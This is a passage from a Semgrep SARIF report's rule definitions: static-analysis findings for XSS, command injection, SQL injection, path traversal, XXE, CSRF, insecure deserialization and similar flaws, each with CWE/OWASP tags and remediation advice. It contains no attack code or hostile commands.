vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte."},"help":{"markdown":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag)\n - [https://www.php.net/manual/en/language.basic-syntax.phptags.php](https://www.php.net/manual/en/language.basic-syntax.phptags.php)\n","text":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte."},"helpUri":"https://semgrep.dev/r/php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","id":"php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","name":"php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe"},"help":{"markdown":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization)\n - [https://github.com/mgholam/fastJSON#security-warning-update](https://github.com/mgholam/fastJSON#security-warning-update)\n","text":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","id":"csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","name":"csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"SSL verification disabled, this allows for MitM attacks"},"help":{"markdown":"SSL verification disabled, this allows for MitM attacks\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.lang.security.ssl-verify-none.ssl-verify-none)\n - [https://docs.rs/openssl/latest/openssl/ssl/struct.SslContextBuilder.html#method.set_verify](https://docs.rs/openssl/latest/openssl/ssl/struct.SslContextBuilder.html#method.set_verify)\n","text":"SSL verification disabled, this allows for MitM attacks"},"helpUri":"https://semgrep.dev/r/rust.lang.security.ssl-verify-none.ssl-verify-none","id":"rust.lang.security.ssl-verify-none.ssl-verify-none","name":"rust.lang.security.ssl-verify-none.ssl-verify-none","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: rust.lang.security.ssl-verify-none.ssl-verify-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The code must not contain any of Unicode Direction Control Characters"},"help":{"markdown":"The code must not contain any of Unicode Direction Control Characters\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.no-bidi-characters.no-bidi-characters)\n - [https://entethalliance.org/specs/ethtrust-sl/v1/#req-1-unicode-bdo](https://entethalliance.org/specs/ethtrust-sl/v1/#req-1-unicode-bdo)\n","text":"The code must not contain any of Unicode Direction Control Characters"},"helpUri":"https://semgrep.dev/r/solidity.security.no-bidi-characters.no-bidi-characters","id":"solidity.security.no-bidi-characters.no-bidi-characters","name":"solidity.security.no-bidi-characters.no-bidi-characters","properties":{"precision":"very-high","tags":["CWE-837: Improper Enforcement of a Single, Unique Action","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.no-bidi-characters.no-bidi-characters"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","id":"scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","name":"scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input."},"help":{"markdown":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.tainted-path-traversal.tainted-path-traversal)\n - [https://medium.com/@emmapinheiro42/php-include-ignore-4a3ba81371af](https://medium.com/@emmapinheiro42/php-include-ignore-4a3ba81371af)\n - [https://www.acunetix.com/websitesecurity/php-security-2/](https://www.acunetix.com/websitesecurity/php-security-2/)\n","text":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input."},"helpUri":"https://semgrep.dev/r/php.lang.security.tainted-path-traversal.tainted-path-traversal","id":"php.lang.security.tainted-path-traversal.tainted-path-traversal","name":"php.lang.security.tainted-path-traversal.tainted-path-traversal","properties":{"precision":"very-high","tags":["CWE-23: Relative Path Traversal","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.tainted-path-traversal.tainted-path-traversal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module](https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"helpUri":"https://semgrep.dev/r/python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","id":"python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","name":"python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions."},"help":{"markdown":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-importlib2)\n","text":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-importlib2","id":"python.lang.compatibility.python37.python37-compatibility-importlib2","name":"python.lang.compatibility.python37.python37-compatibility-importlib2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-importlib2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");"},"help":{"markdown":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms)\n","text":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","id":"java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","name":"java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here."},"help":{"markdown":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe)\n - [https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/cross_site_scripting/index.markdown](https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/cross_site_scripting/index.markdown)\n - [https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/](https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/)\n","text":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","id":"ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","name":"ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","id":"python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","name":"python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"help":{"markdown":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n - [https://github.com/gorilla/csrf](https://github.com/gorilla/csrf)\n","text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"helpUri":"https://semgrep.dev/r/go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","id":"go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","name":"go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","id":"java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","name":"java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user data flowing into exec. This is code injection and should be avoided."},"help":{"markdown":"Detected user data flowing into exec. This is code injection and should be avoided.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.user-exec.exec-injection)\n - [https://nedbatchelder.com/blog/201206/exec_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/exec_really_is_dangerous.html)\n","text":"Detected user data flowing into exec. This is code injection and should be avoided."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.user-exec.exec-injection","id":"python.flask.security.injection.user-exec.exec-injection","name":"python.flask.security.injection.user-exec.exec-injection","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.user-exec.exec-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request)\n - [https://godoc.org/github.com/levigross/grequests#DoRegularRequest](https://godoc.org/github.com/levigross/grequests#DoRegularRequest)\n - [https://github.com/levigross/grequests](https://github.com/levigross/grequests)\n","text":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.sqlx-taint.sqlx-taint)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.sqlx-taint.sqlx-taint","id":"rust.hyper.sql.sqlx-taint.sqlx-taint","name":"rust.hyper.sql.sqlx-taint.sqlx-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.sqlx-taint.sqlx-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"help":{"markdown":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-xml2json-xxe.express-xml2json-xxe)\n - [https://www.npmjs.com/package/xml2json](https://www.npmjs.com/package/xml2json)\n","text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","id":"javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","name":"javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-xml2json-xxe.express-xml2json-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.gorm.gorm-empty-password.gorm-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.gorm.gorm-empty-password.gorm-empty-password","id":"go.secrets.gorm.gorm-empty-password.gorm-empty-password","name":"go.secrets.gorm.gorm-empty-password.gorm-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken 